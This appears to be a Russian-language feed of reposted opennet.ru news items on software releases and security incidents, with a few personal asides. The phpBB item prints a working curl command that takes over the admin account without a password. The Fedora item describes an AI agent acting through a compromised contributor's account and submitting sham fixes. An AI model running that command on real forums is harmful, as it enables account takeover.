Proxmox Mail Gateway функционирует как прокси-сервер, выступающий в роли шлюза между внешней сетью и внутренним почтовым сервером на базе MS Exchange, Lotus Domino или Postfix. Имеется возможность управления всеми входящими и исходящими потоками почтовой переписки. Все логи переписки разбираются и доступны для анализа через web-интерфейс. Предоставляются как графики для оценки общей динамики, так и различные отчёты и формы для получения информации о конкретных письмах и статусе доставки. Поддерживается создание кластерных конфигураций для обеспечения высокой доступности (ведение синхронизированного резервного сервера, данные синхронизируются через SSH-туннель) или балансировки нагрузки.

Предоставляется набор средств для обеспечения защиты, фильтрации спама, фишинга и вирусов. Для блокирования вредоносных вложений применяется ClamAV и база Google Safe Browsing, а против спама предлагается комплекс мер на основе SpamAssassin, включающий поддержку обратной проверки отправителя, SPF, DNSBL, серые списки, систему байесовской классификации и блокировку по базе спамерских URI. Для легитимной корреспонденции предоставляется гибкая система фильтров, позволяющих определять правила обработки почты в зависимости от домена, получателя/отправителя, времени получения и типа содержимого.

Основные новшества:

• Осуществлена синхронизация с пакетной базой Debian 13.5. Ядро Linux обновлено до выпуска 7.0. Реализация файловой системы ZFS обновлена до OpenZFS 2.4. Обновлены версии системы фильтрации спама SpamAssassin 4.0.2, антивирусного пакета ClamAV 1.4.4 и СУБД PostgreSQL 17.
• Улучшен web-интерфейс для управлением помещением проблемных писем в карантин. Интерфейс оптимизирован для работы как со стационарных компьютеров, так и с мобильных устройств. Пользователям предоставлена возможность пометки просмотренными писем, помещённых в карантин из совместно используемых почтовых ящиков, для того чтобы не проводить двойную проверку разными людьми. В отчёте о помещении в карантин теперь показывается не только финальный спамерский вес, но и по-отдельности положительные и отрицательные составляющие для более ясного понимания причины фильтрации письма.

  Добавлена опция для загрузки изображений, присутствующих в помещённых в карантин письмах, только после явного запроса их показа нажатием кнопки "Load Images". В панель администратора добавлена опция "Copy Link" для получения ссылки для доступа к письму, находящемуся в карантине.

• Добавлена поддержка шифрования резервных копий на стороне клиента и управления ключами, используемыми для шифрования. В данном режиме шифруются не только резервируемые данные, но и сопутствующие метаданные, такие как настройки email, правила фильтрации и статистика. Имеется опциональная возможность задания мастер ключа для восстановления.
• Добавлена опция для инициирования проверки резервной копии и просмотра состояния шифрования и проверки для каждого снапшота.
• Реализована поддержка добавления объявлений, показываемых перед входом в интерфейс администрирования, например, для вывода примечаний об использовании.
• Добавлена поддержка сохранения в лог для каждого письма адреса отправителя, преданного во время SMTP-сеанса, а также декодированного содержимого заголовков From, To и Subject для проведения аудита.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65676

#сегодня в Пскове

В Chrome 151 будет удалён обходной путь для установки uBlock Origin

Участники проекта uBlock Origin рекомендовали пользователям Chrome перейти на другие браузеры или переключиться на дополнение uBlock Origin Lite, которое развивается автором uBlock Origin и представляет собой вариант uBlock Origin, переведённый на предложенный в третьей версии манифеста Chrome декларативный API (declarativeNetRequest). Поддержка второй версии манифеста Chrome присутствует в Firefox и Safari, а также будет сохранена в браузерах Brave и Opera на базе движка Chromium.

Третья версия манифеста Chrome, определяющего возможности и ресурсы, доступные для дополнений, написанных с использованием API WebExtensions, разработана в рамках инициативы по упрощению создания безопасных и высокопроизводительных дополнений. Основное недовольство третьей версией манифеста вызвано переводом в режим только для чтения API webRequest, позволявшего подключать собственные обработчики, имеющие полный доступ к сетевым запросам и способные на лету модифицировать трафик. Вместо API webRequest в третьей версии манифеста добавлен ограниченный по своим возможностям API declarativeNetRequest, предоставляющий доступ к встроенному движку для фильтрации, самостоятельно обрабатывающему правила блокировки, не разрешающему использовать собственные алгоритмы фильтрации.

Дополнение uBlock Origin Lite (uBOL) реализует лишь часть функциональности uBlock Origin. В uBlock Origin Lite оказалось проблематично перенести динамические фильтры контента и URL, фильтры HTTP-заголовков, средства для отключения скриптов, шрифтов и мультимедийных элементов большого размера в привязке к отдельным сайтам, многие опции фильтров (strict1p, strict3p, domain, redirect-rule, removeparam), защиту от манипуляций с DNS для обхода блокировки. Из-за необходимости получения дополнительных полномочий в uBlock Origin Lite по умолчанию отключены косметические фильтры для замены содержимого на странице ("##"), подстановки скриптов на сайты ("##+js"), фильтров для перенаправления запросов ("redirect="), фильтров заголовков CSP (Content Security Policy) и фильтров для удаления параметров запросов ("removeparam=").

Источник: https://www.opennet.ru/opennews/art.shtml?num=65675

#сегодня день журавлей какой-то

По дороге на Псков видел 3 гнездящихся журавля (два на опоре ЛЭП, а для одного местные специальный столб соорудили) и один просто шёл вдоль автомобильной дороги.

syslogd(8) privileged and non-privileged parts now separate binaries

Now Alexander Bluhm (bluhm@) decided it's time to split these parts into separate binaries in order to provide even better separation. The final commit message reads,

List:       openbsd-cvs
Subject:    CVS: cvs.openbsd.org: src
From:       Alexander Bluhm <bluhm () openbsd ! org>
Date:       2026-06-11 15:41:33

CVSROOT:	/cvs
Module name:	src
Changes by:	bluhm@cvs.openbsd.org	2026/06/11 09:41:33

Modified files:
	usr.sbin/syslogd: Makefile privsep.c syslogd.c syslogd.h 
	etc/rc.d       : syslogd 
Added files:
	usr.sbin/syslogd: Makefile.inc parent.c 
	usr.sbin/syslogd/parent: Makefile 
	usr.sbin/syslogd/syslogd: Makefile 

Log message:
Provide a separate executable file for syslogd parent.

Read more…

Атакующие скомпрометировали 469 пакетов в репозитории AUR

Атакующие взяли на себя сопровождение пакетов, имеющих статус "orphaned" и оставшихся без сопровождающих. В качестве имени указывалось имя последнего сопровождающего, но другой email, после чего добавлялся один коммит и публиковалось обновление. Коммит добавлял "npm" в список зависимостей PKGBUILD и вставлял в post_install-блок скрипта install.sh строку для установки нескольких NPM-пакетов. В числе устанавливаемых NPM-пакетов присутствовали один или несколько популярных легитимных пакетов и пакет atomic-lockfile, содержащий скрытое вредоносное ПО. Добавление установки NPM-пакетов производилось во все скомпрометированные проекты, даже если в них не используется JavaScript и NPM.

После активации вредоносное ПО закреплялось в системе в виде сервиса systemd со случайным именем и при выполнении камуфлировалось под поток ядра. При запуске с правами root сервис создавался на системном уровне (/etc/systemd/system) и дополнительно активировал работающий на уровне ядра rootkit, а при выполнением с правами пользователя - запускался от имени пользователя (~/.config/systemd/user). Вредоносное ПО осуществляло сканирование и отправку на внешний сервер ключей и учётных данных VPN, Docker, Podman и SSH, а также извлечённых из браузера конфиденциальных данных, истории команд в shell, ключей криптовалютных кошельков, токенов доступа к Slack, Microsoft Teams, Discord, GitHub, NPM и Vault.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65670

На вход в Финляндский огромная очередь на улицу, давно такого не видел.

#театрбезопасности

Выпуск системы шифрования дисковых разделов VeraCrypt 1.26.29

Среди изменений в новой версии:

• Обеспечена возможность воспроизводимой сборки пакетов DEB и RPM, позволяющая удостовериться, что бинарные сборки созданы из предоставляемого исходного кода.
• Для не системных разделов добавлена поддержка альтернативной функции формирования ключа (KDF, Key Derivation Function) Argon2id. В документации и интерфейсе пользователя вместо "PKCS-5 PRF" задействован термин KDF.
• Ужесточена проверка некорректных данных в парсерах XML и TLV.
• Добавлена поддержка сборки с использованием механизма FUSE3 (Filesystem in Userspace).
• Предоставлена возможность выбора работающего на уровне ядра Linux драйвера ntfs3 для точек монтирования с NTFS ("--filesystem=kernel-ntfs" и "-m kernelntfs").
• Реализовано распараллеливание операций при автоматическом определении KDF.
• Для обычных файловых контейнеров задействован режим быстрого форматирования (Quick Format) с использование функции ftruncate() для пометки пустых областей.
• В версии для платформы Windows устранено аварийное завершение при переходе в спящий режим на системах с Windows 11 25H2, улучшена обработка ввода/вывода, ускорено монтирование при автоопределении KDF, добавлена поддержка EFI-загрузчиков заверенных новым сертификатом Microsoft UEFI CA 2023, реализована опция "/protectScreen" для отключения режима блокировки создания скриншотов, добавлена опция "/enableIME" для включения IME (Input Method Editor). Добавлен VeraCrypt C/C++ SDK для создания разделов VeraCrypt из сторонних программ.
• Устранена уязвимость (CVE-2026-53762), проявляющаяся только при сборке с опцией "WOLFCRYPT=1", не применяемой по умолчанию. Уязвимость значительно упрощает подбор пароля к шифрованным разделам из-за использования ключей SHA-256 и SHA-512 на базе функции формирования ключа HKDF вместо PBKDF2-HMAC, игнорирующей заданное в настройках число итераций и PIM (Personal Iterations Multiplier).
• Устранена специфичная для Windows уязвимость (CVE-2026-54073), упрощающая определение наличия скрытых зашифрованных разделов из-за использования типового шаблона записи пустых областей. Тем временем, в поставляемой в Windows штатной системе шифрования разделов BitLocker выявлена ещё не исправленная (0-day) критическая уязвимость "GreatXML" (имеется эксплоит), позволяющая получить полный доступ к зашифрованному разделу BitLocker через манипуляции с разделом Recovery на системах с включённым Windows Defender Offline Scan.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65672

Выпуск X-сервера yserver 1.0.0, написанного на Rust и пригодного для запуска MATE, Xfce и Cinnamon

В yserver решено не поддерживать устаревшие и специфичные возможности, такие как обработка нескольких X11-экранов в одном сервере (многомониторный вывод поддерживается), отличные от TrueColor режимы цветности, непрямой рендеринг (indirect GLX), API драйверов DDX, старые методы работы со шрифтами и подключение клиентов с другим порядком следования байтов (трансляция между big-endian и little-endian).

Вывод графики организован через DRM/KMS и Vulkan-драйверы Mesa. Для управления сеансом и организации доступа к совместно используемым устройствам ввода и вывода используется библиотека libseat. Помимо обособленного X-сервера поставляется ynest - бэкенд для вложенного запуска, поддерживающий работу из Xwayland или другого X11-сервера.

Работа протестирована на системах в GPU AMD Ryzen 9 6900HX (Rembrandt, RDNA2, mesa-драйвер RADV), AMD RX580 (Polaris/GCN4, RADV), Intel i5-7200U (Kaby Lake, mesa-драйвер ANV), NVIDIA GTX 1050, Snapdragon X1 X1E80100 (Adreno X1, Turnip), Apple M1 MBA, M2 MBP, а также в системах виртуализации с virtio-gpu и виртуальным GPU Venus. В настоящее время поддерживается только работа в Linux, но в планах отмечено добавление поддержки FreeBSD.

Поддерживаемые расширения X11:

• BIG-REQUESTS
• Composite
• DAMAGE
• DPMS
• DRI3
• GLX
• Generic Event Extension
• MIT-SCREEN-SAVER
• MIT-SHM
• Present
• RANDR
• RENDER
• SHAPE
• SYNC
• X-Resource
• XFIXES
• XInputExtension
• XKEYBOARD
• XTEST


Источник: https://www.opennet.ru/opennews/art.shtml?num=65671

Уязвимость в phpBB, позволяющая получить доступ к любому аккаунту без аутентификации

При атаке на обычных пользователей можно получить доступ к приватной переписке и возможности отправлять сообщения от имени пользователя. При атаке на модераторов и администраторов можно удалять чужие сообщения и читать приватную переписку, но нельзя зайти в интерфейс администратора и получить доступ к хосту.

Детали об уязвимости не приводятся, но при помощи AI на основе исправления уже воссоздан метод эксплуатации, основанный на обращении к обработчику "login_link" с выставлением метода аутентификации "auth_provider=apache" и подстановкой логина через Basic Auth, после чего PHP выставит переменную окружения "PHP_AUTH_USER=логин", а phpBB извлечёт из неё логин пользователя без проверки пароля. Например, для получения идентификатора сессии пользователя admin и сохранения его в файл cookies.txt можно выполнить код:

   curl -i -s \
     -c cookies.txt \
     -b cookies.txt \
     -u 'admin:anything' \
     -d 'login=Login&login_username=admin&login_password=anything' \
     'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'

Проект ReactOS достиг возможности запуска игр Half-Life и Unreal Tournament 2004

В октябре в Переславле-Залесском состоится XXII конференция разработчиков СПО

Будет доступна прямая трансляция. С видеозаписями докладов и презентаций прошлых лет можно ознакомиться на странице конференции, там же доступны сборники тезисов. Кроме того, видео докладов традиционно доступны на 0x1.tv и там же можно ознакомиться с презентациями докладов.

Принимаются доклады по следующим темам:

• Разработка свободного программного обеспечения
• Новейшие достижения проектов СПО
• Формирование сообщества разработчиков СПО
• Философские, культурные и правовые аспекты свободного ПО
• Студенческие проекты разработки СПО
• Разработка свободного аппаратного обеспечения (OSHW)

Работы должны освещать тематику свободного ПО или OSHW. Доклады о бизнесе, рекламные и о проприетарном ПО не допускаются. Если тема доклада связана с разработкой ПО, заявка должна содержать ссылку на сам код, опубликованный в любом общедоступном репозитории под любой свободной лицензией (по определению ГОСТ Р 54593-2011, FSF или OSI). Если тема доклада связана с разработкой свободного аппаратного обеспечения (OSHW), то все материалы проекта должны быть опубликованы в соответствии с требованиями Open Source Hardware (OSHW) Definition.

Заявки принимаются:

• на доклады до 6 сентября
• подача тезисов докладов возможна до 10 сентября, заявки без тезисов не рассматриваются
• публикация программы 17 сентября
• на участие слушателем до 28 сентября (с трансфером из Москвы и обратно)
• на участие слушателем до 30 сентября (без трансфера)

Участие в конференции для докладчиков и слушателей бесплатное, предоставляется трансфер из Москвы и обратно, а также в дни конференции от гостиницы «Переславль» до места проведения: Ярославская область, Переславский район, с. Веськово, улица Петра Первого, д. 4А (Институт программных систем имени А.К. Айламазяна РАН). Докладчикам оплачивается проживание (одному человеку на доклад).

Источник: https://www.opennet.ru/opennews/art.shtml?num=65663

Джордж Вудкок, "Тирания часов" (перевод Марии Рахманиновой, #akrateia)

Земледелец трудится в согласии с природными стихиями, ремесленник – до тех пор, пока не доведёт своё изделие до доступного ему совершенства. Ещё совсем недавно время воспринималось как неотделимая часть природного процесса, и люди не были озабочены его точным измерением.
...
Напротив, современный западный человек живёт в мире, который в полной мере функционирует согласно механическим и математическим символам часовой разметки. Часы диктуют его движения и ограничивают его действия; часы превращают время из природного процесса – в товар, который можно измерять, покупать и продавать – как мыло или изюм.

(#федичитает #чтопочитать)

В Fedora выявлена подмена взломанного участника AI-агентом для продвижения сомнительных изменений

Подозрение вызвало то, что ранее особо не проявлявший себя разработчик в мае стал активно участвовать в обсуждении ошибок и отправлять патчи, при том, что в подобной активности прослеживались шаблоны, свойственные использованию AI. Например, в комментариях встречались созданные через AI обобщения, после которых Натана просили не злоупотреблять копированием выводов от AI-ассистента.

Кроме того, отмечались не несущие какого-то смыла переназначения на себя отчётов о проблемах в подсистемах, в которых Натан не является сопровождающим (1, 2, 3), изменения статуса или приоритета исправления проблем (1, 2), публикации созданных через AI рекомендаций авторам сообщений об ошибках (1, 2, 3) и отправки снерерированных в AI патчей. В обход правил проекта Натан закрывал отчёты об ошибках сразу после передачи AI-патчей в вышестоящие проекты, не дожидаясь их принятия, или просто закрывал с флагом "NOTABUG" и рекомендацией перепроверить проявление проблемы.

Адам Уильямсон предположил, что Натан задействовал для работы AI-агента для исправления ошибок в Fedora и попросил прекратить использование AI-агента в автономном режиме. Натан ответил, что это не его AI-агент, его учётные данные были скомпрометирваны и кто-то посторонний действует от его имени. Следом Натан опубликовал сообщение, что он восстановил доступ к учётным записям в Fedora и GitHub, а также написал, что его официальный аккаунт в GitHub - "nathangiovannini99".

Сообщение вызвало ещё больше вопросов, так как отмеченная учётная запись была создана за час до публикации письма и в GitHub всплыли ещё как минимум две учётные записи, ассоциированные с Натаном (leurus27-boop, nathan9513-aps). Не исключалось, что с разработчиками Fedora продолжает общаться злоумышленник, получивший доступ к email Натана. Доступ учётной записи Натана к Bugzilla был заблокирован и была запущена проверка всех совершённых им изменений.

Выяснилось, что подозрительная деятельность началась 7 апреля и некоторые отправленные Натаном патчи лишь создавали видимость исправления. При этом подобные патчи были приняты в состав интсллатора Anaconda и вошли в состав релиза Anaconda 45.5. Сопровождающий Anaconda отменил внесённые изменения и опубликовал релиз Anaconda 45.6 без этих патчей.

Помимо этого, отправленные от имени Натана исправления были приняты разработчиками утилиты osc (openSUSE Commander) с реализацией интерфейса командной строки для сборочной системы Open Build Service. Ещё один патч был передан для включения в пакет lxqt-policykit с привязкой к исправлению проблемы в Fedora, но разработчики Fedora успели предупредить сопровождающего до его принятия. Патчи не включали вредоносных действий, но предполагается, что они могли быть подготовкой к внесению вредоносных изменений в компоненты сборочной системы и сервиса, обеспечивающего выполнение привилегированных операций. Отправленные Натаном исправления также были замечены в проектах gwenview и easyeffects.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65664

Первый стабильный выпуск открытого офисного пакета Euro-Office

К разработке Euro-Office подключилось 12 европейских компаний и организаций, среди которых Nextcloud, IONOS, Eurostack, XWiki, OpenProject, Soverin, Abilian и BTactic. Проект преподносится как открытая, прозрачно развиваемая и независимая платформа для совместной работы с документами, рассчитанная на использование через Web и интеграцию со сторонними продуктами, такими как системы обмена файлами, wiki и инструментами управления проектами. Заявлена совместимость с форматами MS Office и OpenDocument (DOCX, PPTX, XLSX, ODT, ODS, ODP).

Среди причин создания собственного форка вместо присоединения к разработке открытого проекта ONLYOFFICE упоминаются:

• Проблематичность передачи изменений в кодовую базу платформы ONLYOFFICE, разработчики которой не рецензируют присылаемые изменения, не принимают pull-запросы и не заботятся о корректности и актуальности инструкций по сборке.
• Развивающая ONLYOFFICE компания периодически принимает спорные решения, такие как отключение редактирования в мобильном приложении и удаление панели администратора.
• Отсутствие прозрачности - тексты в коммитах часто ссылаются на внутренние системы отслеживания ошибок, в поставку входят бинарные блобы и обфусцированный код. Часть комментариев в коде на русском языке, что затрудняет работу с кодом международными командами.
• Мобильное приложение не полностью открыто и завязано на проприетарные компоненты.
• Значительная часть разработчиков ONLYOFFICE находится в РФ, что усложняет совместную работу и подрывает доверие из-за политической ситуации, особенно когда процессы разработки непрозрачны и отгорожены.

Организация The Document Foundation, курирующая разработки офисного пакета LibreOffice, опубликовала открытое письмо с критикой проекта Euro-Office и методов его продвижения. Недовольство вызывает то, что в Euro-Office по умолчанию применяется формат OOXML, подконтрольный компании Microsoft. По мнению The Document Foundation, использование по умолчанию проприетарного формата OOXML вместо открытого стандарта OpenDocument расходится с заявленной целью формирования европейского цифрового суверенитета, так как Euro-Office укрепляет привязку к одному американскому производителю, не способствующему предоставлению пользователям свободы полностью контролировать собственный контент.

Также подвергаются критике заявления о том, что Euro-Office стал первым открытым офисным пакетом, разработанным в Европе. Первым европейскими открытыми офисными пакетами являются OpenOffice.org и LibreOffice, основанные на исходном коде StarOffice, разработанном немецкой компанией Star Division. Euro-Office же создан на волне роста популярности идей цифрового суверенитета в результате ребрендинга сторонней кодовой базы.



Источник: https://www.opennet.ru/opennews/art.shtml?num=65662

Первый выпуск операционной системы GentleOS с ретро GUI для винтажных ПК

ОС построена на базе монолитной архитектуры и конфигурируется на этапе сборки. Доступны драйверы для видеокарт VGA/SVGA, клавиатуры, мыши (подключение через PS/2 и последовательный порт) и встроенного громкоговорителя. Функциональность GentleOS отмечена как завершённая - из планов на будущее отмечается только создание дополнительных приложений, проведение оптимизации и исправлением ошибок. Возможен запуск как в QEMU, так и на реальном оборудовании.

Из приложений доступны калькулятор, календарь, часы, генератор звука, простейший графический редактор и несколько игр, таких как змейка, mahjong, минёр и тетрис.

Отдельно развивается вариант GentleOS/16, поддерживающий работу на 16-разрядных системах с CPU Intel 80186. Сборка данного варианта сформирована для запуска с дискет, размером 720 Кб и 1.4 Мб. Поддерживается работа на ПК с 192 КБ ОЗУ и графическим адаптером CGA (320x200x4).

Уязвимость в процессорах ARM, позволяющая обойти изоляцию виртуальных машин

Проблема проявляется только на многоядерных процессорах Arm C1-Ultra, C1-Premium, Neoverse V3 & V3AE, Neoverse V2, Neoverse V1, Neoverse N2, Neoverse N1, Cortex-X925, Cortex-X4, Cortex-X3, Cortex-X2, Cortex-X1 & X1C, Cortex-A710, Cortex-A78, A78AE & A78C, Cortex-A77, Cortex-A76 & A76AE и NVIDIA Olympus. Для блокирования проблемы обходным путём для ядра Linux предложен патч, который пока не вошёл в состав корректирующих обновлений. Исправление также выпущено для гипервизора Xen.

Уязвимость возникает в процессе выполнения операции TLBI (TLB Invalidation) для очистки записи в кэше трансляции виртуальных адресов в физические. Инструкция DSB (Data Synchronization Barrier), фиксирующая выполнение операции TLBI, на одном ядре может завершиться раньше, чем операция записи на другом ядре станет глобально видна всем ядрам. Таким образом, операция записи может быть завершена после того, как права доступа были изменены через TLBI.

Данная рассинхронизация состояния может применяться для обхода запрета доступа на уровне таблиц трансляции виртуальных адресов в физические (Stage 1) и трансляция адресов виртуальной машины (Stage 2), а также обхода механизма защиты целостности памяти GPT (Granule Protection Table). Например, гипервизор может выполнить инструкцию TLBI для запрета доступа к памяти для виртуальной машины, но гостевая система сможет продолжить писать в эту память, несмотря на подтверждение прекращения доступа.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65660

Первый выпуск операционной системы GentleOS с ретро GUI для винтажных ПК

ОС построена на базе монолитной архитектуры и конфигурируется на этапе сборки. Доступны драйверы для видеокарт VGA/SVGA, клавиатуры, мыши (подключение через PS/2 и последовательный порт) и встроенного громкоговорителя. Функциональность GentleOS отмечена как завершённая - из планов на будущее отмечается только создание дополнительных приложений, проведение оптимизации и исправлением ошибок. Возможен запуск как в QEMU, так и на реальном оборудовании.

Из приложений доступны калькулятор, календарь, часы, генератор звука, простейший графический редактор и несколько игр, таких как змейка, mahjong, минёр и тетрис.

Отдельно развивается вариант GentleOS/16, поддерживающий работу на 16-разрядных системах с CPU Intel 80186. Сборка данного варианта сформирована для запуска с дискет, размером 720 Кб и 1.4 Мб. Поддерживается работа на ПК с 192 КБ ОЗУ и графическим адаптером CGA (320x200x4).

Lets Encrypt добавил в пользовательское соглашение запрет на выдачу сертификатов для стран под санкциями США

Помимо этого под запрет подпадают лица и организации, являющиеся объектом персональных санкций и ограничений экспортного контроля США, а также организации, контролируемые лицами, подпадающими под санкции, или действующие от их имени. Отмечается, что организация Let's Encrypt зарегистрирована в США и обязана выполнять правила экспортного контроля и санкции, действующие в США.

Пока не понятно, является ли изменение пользовательского соглашения формальностью, отражающую уже применимую практику, или будут реализованы дополнительные меры блокировки запросов из подсетей для стран, подпадающих под санкции. До сих пор в Let's Encrypt применялись точечные блокировки, не позволяющие получить сертификат для конкретных доменов, перечисленных в санкционных списках управления по контролю за иностранными активами США (OFAC, Office of Foreign Assets Control).

Полномасштабные санкции США введены против Крыма, ДНР, ЛНР, Ирана, КНДР и Кубы. Против РФ введены жёсткие санкции, но пока не применяется полный эмбарго. В данный момент запросы к Let's Encrypt на получение сертификатов из РФ для доменов, не упомянутых в санкционных списках, принимаются без ограничений.

Дополнение: Комментируя изменение пользовательского соглашения, директор организации ISRG (Internet Security Research Group), которая является учредителем проекта Let's Encrypt, пояснил, что сертификаты продолжат выдаваться для Ирана и России, но не будут доступны для российских и иранских госучреждений. По словам представителя Let's Encrypt, изменения лишь документируют давно сложившуюся практику для выполнения юридических формальностей и никаких новых блокировок не последует.

Возможность предоставлять сертификаты для негосударственных учреждений и частных лиц на подсанкционных территориях обеспечивается благодаря действующим в США законам о защите частной переписки и послаблениям, принятым Управлением по контролю за иностранными активами (OFAC) для содействия соблюдению прав человека и свобод в интернете.

Релиз минималистичного дистрибутива Alpine Linux 3.24

В новом выпуске:

• В инсталлятор (setup-alpine) добавлена поддержка загрузчика Limine, поддерживающего сетевую загрузку по IPv6.
• В состав репозитория "community" добавлены пакеты со средой рабочего стола COSMIC, разрабатываемой компанией System76 на языке Rust.
• Удалены пакеты, использующие библиотеки GTK 2 и Qt5, которые не удалось портировать на актуальные ветки GTK и Qt. GTK 2 планируют удалить в следующем выпуске.
• Предложены пакеты с новыми версиями графических окружений GNOME 50.2, KDE Plasma 6.6, LXQt 2.4.0 и Sway 1.12.
• Обновлены версии пакетов, например, доступны выпуски GRUB 2.14, LLVM 22, Rust 1.96, Go 1.26, Qt 6.11, wlroots 0.20, nginx 1.30, Xen 4.21. Пакет с ядром Linux продолжает поставляться с веткой 6.18.
• Для новых установок предложена опциональная возможность переноса всех исполняемых файлов и библиотек из корневых каталогов в раздел /usr (/bin, /sbin и /lib* унифицированы с соответствующими каталогами внутри /usr и оформлены через символические ссылки на них). Для задействования подобного слияния во время установки следует выставить переменную окружения BOOTSTRAP_USR_MERGED перед вызовом утилиты setup-disk. На уже имеющихся системах для слияния можно использовать пакет merge-usr.
• Сборочная система setuptools обновлена до версии 82.0.0, в которой удалён модуль pkg_resources.
• Объявлен устаревшим сервис qemu-binfmt из пакета qemu-openrc , вместо которого для размещения файлов конфигурации следует использовать каталог binfmt.d вместе с сервисом binfmt.
• Из репозитория "main" в "community" перемещены пакеты с GTK 3.0.
  
  Источник: https://www.opennet.ru/opennews/art.shtml?num=65657
  

Выпуск ядра Asterinas 0.18, написанного на языке Rust и совместимого с Linux

В настоящее время в ядре реализовано около 240 системных вызовов Linux. В дистрибутиве Asterinas NixOS верифицирована работа поверх ядра Asterinas более 100 пакетов из NixOS. Среди поддерживаемых пакетов: Xfce, Firefox, bash, systemd, Podman, QEMU, rsync, Apache httpd, nginx, SQLite, Redis, Clang, GCC, Go, Lua, Node.js, OpenJDK, Perl, PHP, Python, Ruby, Rust, Git, FFmpeg, PyTorch, TensorFlow, Ollama и Codex.

В ядре обеспечена полная поддержка архитектуры x86-64, частичная поддержка RISC-V 64 и x86-64 с изоляцией на базе Intel TDX, а также начальная поддержка архитектуры LoongArch 64. Из приоритетных областей применения называются системы, завязанные на Linux ABI, но требующие более высокого уровня защищённости. Например, Asterinas предлагается использовать для формирования системного окружения защищённых виртуальных машин, для изоляции которых используются такие технологии, как ARM CCA, AMD SEV и Intel TDX, а также на стороне хост-системы, обеспечивающей запуск контейнеров.

Для снижения вероятности появления ошибок при работе с памятью, являющихся главным источником наиболее опасных уязвимостей, при написании Asterinas задействован язык Rust и тактика ограниченного использования unsafe-блоков. Ядро построено с использованием архитектуры framekernel, в которой попытались совместить возможности изоляции микроядер с эффективностью монолитных ядер.

Компоненты ядра в Asterinas размещаются в общем адресном пространстве, а безопасность достигается на уровне логического разделения безопасного кода и кода, в котором не исключено возникновение проблем с безопасностью. Ядро разбито на две части, написанные на Rust: OS Framework и OS Services. В OS Services запрещено применение unsafe-блоков, а все низкоуровневые операции, требующие выполнения кода в блоках unsafe, вынесены в OS Framework и доступны только через высокоуровневый API. Все системные вызовы, файловые системы и драйверы реализуются на уровне OS Services и не могут включать unsafe-блоки.

Для разработки системных сервисов и модулей ядра поставляется инструментарий OSDK (Operating System Development Kit), предоставляющий утилиту cargo-osdk для создания, сборки, тестирования и запуска компонентов операционной системы. Для разработчиков подготовлен набор библиотек OSTD (Operating System Standard Library), включающий редакцию стандартных библиотек Rust(crate std), адаптированную для использования в компонентах операционной системы.

Среди изменений в версии 0.18:

• В рамках работы по обеспечению запуска Asterinas в качестве гостевой системы в VM-контейнерах Kata Containers и Confidential Containers реализована поддержка пространств имён IPC и cgroup, nsfs (/proc/[pid]/ns), cgroups, virtio-fs (для доступа к общей с хост-системой ФС), virtio-rng (/dev/hwrng для энтропии к генератору псеводослучайных чисел) и vsock (для взаимодействия между хостовой и гостевой системами).
• Реализован системный вызов ptrace и возможности для отладки в пространстве пользователя при помощи GDB и strace.
• Предложена новая реализация файловой системы ext2 и добавлен драйвер NVMe. В VFS добавлен механизм Dentry (Directory Entry) и переделана реализация страничного кэша.
• В дистрибутиве Asterinas NixOS реализована возможность запуска Codex, QEMU и Firefox.
• Добавлены системные вызовы pidfd_getfd, pidfd_send_signal, pivot_root.
• Добавлена начальная поддержка IPv6.
• Реализована система capabilities для делегирования отдельных привилегированных операций.
• Добавлена начальная реализация фреймворка LSM (Linux Security Modules).


Источник: https://www.opennet.ru/opennews/art.shtml?num=65654

Релиз графической библиотеки LDL 0.2, оптимизированной для маломощных систем

В новом выпуске:

• Добавлен универсальный 2D-рендер позволяющий, выводить примитивы и текстуры с прозрачностью и без. Поддерживается работа на видеокартах с поддержкой OpenGL 1.2, 2.0 или 3.0. В реализации используется оптимизация, которая вначале помещает данные в буфер отрисовки, сортирует по слою и текстуре, и затем преобразует в геометрию.
• Добавлен экспериментальный 3D-рендер, который поддерживает работу поверх разных версий OpenGL, но предоставляет единый API.
• Реализована обвязка для языка С++.

В следующей версии планируется уделить внимание улучшению универсального 3D API, добавить поддержку звука, подготовить документацию и предоставить обвязки к другим языкам.



Источник: https://www.opennet.ru/opennews/art.shtml?num=65653